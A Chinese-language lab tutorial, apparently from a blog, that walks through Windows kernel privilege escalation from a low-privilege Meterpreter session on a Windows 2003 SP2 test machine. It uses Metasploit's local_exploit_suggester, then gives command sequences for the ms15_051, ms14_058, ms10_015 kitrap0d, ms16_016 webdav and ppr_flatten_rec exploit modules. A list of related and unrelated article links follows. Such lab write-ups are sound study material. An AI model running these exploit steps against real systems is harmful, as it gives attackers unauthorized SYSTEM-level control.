windows内核提权漏洞

环境:

Kali Linux(攻击机) 192.168.190.141

Windows2003SP2(靶机) 192.168.190.147

0x01寻找可利用的exp

实战中我们在拿到一个反弹shell后(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。

如下图,有一个普通用户权限的会话

在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

可以看到我这里有和目标机的一个session会话,id为4,我们使用local_exploit_suggester模块





use post/multi/recon/local_exploit_suggester

set LHOST 192.168.190.141

set SESSION 

Exploit








 


如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用的exp模块。




0x02 利用exp提权


根据metaspolit的内置模块Local Exploit Suggester模块列出的可利用模块,我们来进行提权,提权成功后会返回新的、提升权限成功后的session会话。


选取了几个常见的可利用的模块来进行提权演示。


 


Windows ClientCopyImage Win32k Exploit(ms15_051)
Windows内核模式驱动程序中的漏洞让攻击者可以进行提权。
这个模块利用了win32k.sys内核模式驱动程序中不正确的对象处理。


 


使用模块 查看设置的参数




设置参数 提权




use exploit/windows/local/ms15_051_client_copy_image

set lhost 192.168.190.141

set session 

exploit






Windows TrackPopupMenu Win32k NULL Pointer Dereference(ms14_058)
该模块利用了win32k.sys中的NULL Pointer Dereference,这个漏洞可以通过使用TrackPopupMenu来触发。在特定情况下,可以在xxxSendMessage Timeout上滥用NULL Pointer Dereference来获取任意代码执行。
这个模块已经在Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164位上测试过。




use exploit/windows/local/ms14_058_track_popup_menu

set lhost 192.168.190.141

set session 

exploit
 






通过KiTrap0D进行Windows系统提权(ms10_015)
这个模块会通过Kitrap0D这个exp来生成一个SYSTEM权限的新会话,如果当前会话已经是SYSTEM权限,那么这个脚本将不起作用。这个脚本依赖于kitrap0d.x86.dll这个文件,而且不支持64位的Windows操作系统。
该模块已经在存在漏洞的Windows Server 2003,Windows Server 2008,Windows7和XP上测试过,只限32位操作系统。




use exploit/windows/local/ms10_015_kitrap0d

set lhost 192.168.190.141

set session 

exploit






mrxdav.sys WebDav本地提权MS16-016
这个exp利用的是mrxdav.sys中的漏洞,漏洞编号是MS16-016。该模块会在目标主机上生成一个进程,并通过在特权进程的环境下执行指定的payload来提权。
该模块在存在漏洞的Windows7 SP1 x86架构上测试过可行。




use exploit/windows/local/ms16_016_webdav

set lhost 192.168.190.141

set session 

exploit






EPATHOBJ::pprFlattenRec本地提权
这个漏洞是由于EPATHOBJ::pprFlattenRec使用了未初始化的数据而产生的,该漏洞可以对内存产生破坏。
而我们的这个脚本就是利用这个漏洞来提权的。


这个模块已经在Windows XP SP3,Windows2003SP1和Windows7SP1上成功执行。




use exploit/windows/local/ppr_flatten_rec

set lhost 192.168.190.141

set session 

exploit
 




因为实验是sp2就没有成功


												


											
msf利用- windows内核提权漏洞的更多相关文章
	

    
								
  1. 9.CVE-2016-5195(脏牛)内核提权漏洞分析
		
    漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2 ...
    
		
    2. 
						
  2. Linux本地内核提权漏洞复现(CVE-2019-13272)
		
    Linux本地内核提权漏洞复现(CVE-2019-13272) 一.漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_c ...
    
		
    3. 
						
  3. CVE-2019-13272:Linux本地内核提权漏洞复现
		
    0x00 简介 2019年07月20日,Linux正式修复了一个本地内核提权漏洞.通过此漏洞,攻击者可将普通权限用户提升为Root权限. 0x01 漏洞概述 当调用PTRACE_TRACEME时,pt ...
    
		
    4. 
						
  4. Windows原理深入学习系列-Windows内核提权
		
    这是[信安成长计划]的第 22 篇文章 0x00 目录 0x01 介绍 0x02 替换 Token 0x03 编辑 ACL 0x04 修改 Privileges 0x05 参考文章 继续纠正网上文章中 ...
    
		
    5. 
						
  5. 新Windows本地提权漏洞学习(CVE-2019-0841)
		
    1.这是一个啥漏洞? 睁眼一看,妈呀本地提权,快加入本地提权漏洞利用包里,速度加入.github连接我就不发了.担心被认为是传播黑客工具,咱们在这里单纯学习一下漏洞的原理和部分源代码. 2.文件读写权 ...
    
		
    6. 
						
  6. Windows 10 提权漏洞复现及武器化利用
		
    项目地址:https://github.com/SandboxEscaper/randomrepo 相关工具的下载地址: Process Explorer:https://docs.microsoft ...
    
		
    7. 
						
  7. Linux内核提权漏洞(CVE-2019-13272)
		
    漏洞描述 kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程 ...
    
		
    8. 
						
  8. windows内核提权
		
    Windows by default are vulnerable to several vulnerabilities that could allow an attacker to execute ...
    
		
    9. 
						
  9. 2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核提权+Exploit-Exercises Nebula学习与实践
		
    目录 PART ONE :Windows本地内核提权 漏洞概述 漏洞原理 漏洞复现 windbg调试本地内核 查看SSDT表和SSDTShadow表 查看窗口站结构体信息 利用Poc验证漏洞 漏洞利用 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 【ThinkPHP】API控制器中加入析构函数
			
    <?php namespace app\api\controller; use think\Controller; class User extends Controller { public  ...
    
			
    2. 
						
  2. Winform中DevExpress的TreeList的入门使用教程(附源码下载)
			
    场景 Winform控件-DevExpress18下载安装注册以及在VS中使用: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/1 ...
    
			
    3. 
						
  3. maven的mirror和repository加载顺序
			
    一.概述 maven的settings.xml文件里面有proxy.server.repository.mirror的配置,在配置仓库地址的时候容易混淆 proxy是服务器不能直接访问外网时需要设置的 ...
    
			
    4. 
						
  4. [Pandas] 02 - Tutorial of NumPy
			
    Ref: NumPy 教程 这里主要是查缺补漏一些常用方法. 初步认识 矩阵常见知识点 矩阵操作 Ref: [Python] 01 - Number and Matrix[总结过一部分] 一.矩阵 ( ...
    
			
    5. 
						
  5. MyEclipse中的web项目之前有个感叹号
			
    java web项目有感叹号说明导入的jar包存在问题 或者环境配置不正确 解决办法是点击项目-->Build path -->configure Build Path 然后来到Libra ...
    
			
    6. 
						
  6. 转载:alpha测试和beta测试的区别;黑盒测试和白盒测试的区别;
			
    alpha测试版,有点相当于内部测试,一般开发人员在场   ,是由用户做测试,但开发人员在场,一般是请用户到开发现场去测试 beta测试版,完全交给用户,由用户做测试,返回测试报告,相当于发行前的一个 ...
    
			
    7. 
						
  7. Spring MVC-从零开始-分拆applicationContext. xrnl
			
    1.目录结构 2.web.xml配置 <?xml version="1.0" encoding="ISO-8859-1"?> <web-app ...
    
			
    8. 
						
  8. eclipse与hadoop集成,运行wordCount1
			
    搭好了hadoop集群之后,就该使用它了 第一步:下载hadoop eclipse的插件,将它放到eclipse\plugins的目录下,然后重启eclipse,点击windows->show  ...
    
			
    9. 
						
  9. css实现斜角效果
			
    重点代码: 使用一张图片盖住div,实现斜角效果 .triangle { position: absolute; top:; left:; width: 36px; height: 36px; bac ...
    
			
    10. 
						
  10. [数学基础]奇异值分解SVD
			
    之前看到过很多次奇异值分解这个概念,但我确实没有学过.大学线性代数课教的就是坨屎,我也没怎么去上课,后来查了点资料算是搞清楚了,现在写点东西总结一下. 奇异值分解,就是把一个矩阵拆成一组矩阵之和.在数 ...
    
			
    11.